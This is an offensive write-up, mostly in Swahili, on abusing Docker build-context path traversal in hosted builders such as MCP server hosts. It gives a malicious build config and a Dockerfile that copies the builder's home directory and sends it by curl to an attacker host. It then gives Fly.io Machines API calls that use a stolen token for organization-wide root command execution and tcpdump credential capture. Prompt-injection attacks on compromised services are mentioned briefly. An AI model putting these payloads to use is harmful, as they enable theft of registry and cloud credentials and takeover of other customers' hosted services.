Kutumia vibaya Docker Build Context katika Hosted Builders (Path Traversal, Exfil, and Cloud Pivot)

Reading time: 5 minutes

TL;DR

Kama jukwaa la CI/CD au hosted builder linamruhusu mchango kutoa Docker build context path na Dockerfile path, mara nyingi unaweza kuweka context hadi directory ya mzazi (mfano, "..") na kufanya mafaili ya host kuwa sehemu ya build context. Kisha, Dockerfile inayodhibitiwa na mshambuliaji inaweza COPY na kutoa siri zilizopo kwenye home ya mtumiaji wa builder (kwa mfano, ~/.docker/config.json). Stolen registry tokens pia zinaweza kufanya kazi dhidi ya provider’s control-plane APIs, zikiwezesha org-wide RCE.

Attack surface

Many hosted builder/registry services do roughly this when building user-submitted images:

• Read a repo-level config that includes:
• build context path (sent to the Docker daemon)
• Dockerfile path relative to that context
• Copy the indicated build context directory and the Dockerfile to the Docker daemon
• Build the image and run it as a hosted service

If the platform does not canonicalize and restrict the build context, a user can set it to a location outside the repository (path traversal), causing arbitrary host files readable by the build user to become part of the build context and available to COPY in the Dockerfile.

Practical constraints commonly observed:

• The Dockerfile must reside within the chosen context path and its path must be known ahead of time.
• The build user must have read access to files included in the context; special device files can break the copy.

PoC: Path traversal via Docker build context

Example malicious server config declaring a Dockerfile within the parent directory context:

runtime: "container"
build:
dockerfile: "test/Dockerfile"   # Must reside inside the final context
dockerBuildPath: ".."           # Path traversal to builder user $HOME
startCommand:
type: "http"
configSchema:
type: "object"
properties:
apiKey:
type: "string"
required: ["apiKey"]
exampleConfig:
apiKey: "sk-example123"

Vidokezo:

• Kutumia ".." mara nyingi husuluhisha kwenye home ya mtumiaji builder (kwa mfano, /home/builder), ambayo kawaida ina faili nyeti.
• Weka Dockerfile yako ndani ya saraka yenye jina la repo (kwa mfano, repo "test" → test/Dockerfile) ili ibaki ndani ya muktadha wa saraka mzazi uliopanuliwa.

PoC: Dockerfile ya ingest na exfiltrate host context

FROM alpine
RUN apk add --no-cache curl
RUN mkdir /data
COPY . /data                      # Copies entire build context (now builder’s $HOME)
RUN curl -si https://attacker.tld/?d=$(find /data | base64 -w 0)

Malengo yanayopatikana mara nyingi kutoka $HOME:

• ~/.docker/config.json (registry auths/tokens)
• Cache na config nyingine za cloud/CLI (mfano, ~/.fly, ~/.kube, ~/.aws, ~/.config/*)

Kidokezo: Hata ikiwa kuna .dockerignore katika repository, uchaguzi wa muktadha upande wa jukwaa ambao unaathiriwa bado ndio unaodhibiti nini kinatumwa kwa daemon. Iwapo jukwaa linanakili njia iliyochaguliwa kwa daemon kabla ya kutathmini .dockerignore ya repo yako, faili za host zinaweza bado kufichuka.

Kuingia kwenye cloud kwa tokens zenye ruhusa kupita kiasi (mfano: Fly.io Machines API)

Baadhi ya majukwaa hutoa bearer token moja inayoweza kutumika kwa container registry na control-plane API. Ikiwa utaexfiltrate registry token, ujaribu dhidi ya provider API.

Mifano ya API calls dhidi ya Fly.io Machines API ukitumia token iliyoporwa kutoka ~/.docker/config.json:

Enumerate apps in an org:

curl -H "Authorization: Bearer fm2_..." \
"https://api.machines.dev/v1/apps?org_slug=smithery"

Endesha amri kama root ndani ya mashine yoyote ya app:

curl -s -X POST -H "Authorization: Bearer fm2_..." \
"https://api.machines.dev/v1/apps/<app>/machines/<machine>/exec" \
--data '{"cmd":"","command":["id"],"container":"","stdin":"","timeout":5}'

Matokeo: remote code execution kwa shirika nzima (org-wide) katika apps zote zilizo-hosted ambapo token ina privileges za kutosha.

Ujambazi wa siri kutoka kwa hosted services zilizothirika

Kwa exec/RCE kwenye hosted servers, unaweza kuvuna client-supplied secrets (API keys, tokens) au kuendesha prompt-injection attacks. Mfano: weka tcpdump na rekodi HTTP traffic kwenye port 8080 ili kutoa inbound credentials.

# Install tcpdump inside the machine
curl -s -X POST -H "Authorization: Bearer fm2_..." \
"https://api.machines.dev/v1/apps/<app>/machines/<machine>/exec" \
--data '{"cmd":"apk add tcpdump","command":[],"container":"","stdin":"","timeout":5}'

# Capture traffic
curl -s -X POST -H "Authorization: Bearer fm2_..." \
"https://api.machines.dev/v1/apps/<app>/machines/<machine>/exec" \
--data '{"cmd":"tcpdump -i eth0 -w /tmp/log tcp port 8080","command":[],"container":"","stdin":"","timeout":5}'

Maombi yaliyorekodiwa mara nyingi huwa na client credentials katika headers, bodies, au query params.

Marejeo

• Breaking MCP Server Hosting: Build-Context Path Traversal to Org-wide RCE and Secret Theft
• Fly.io Machines API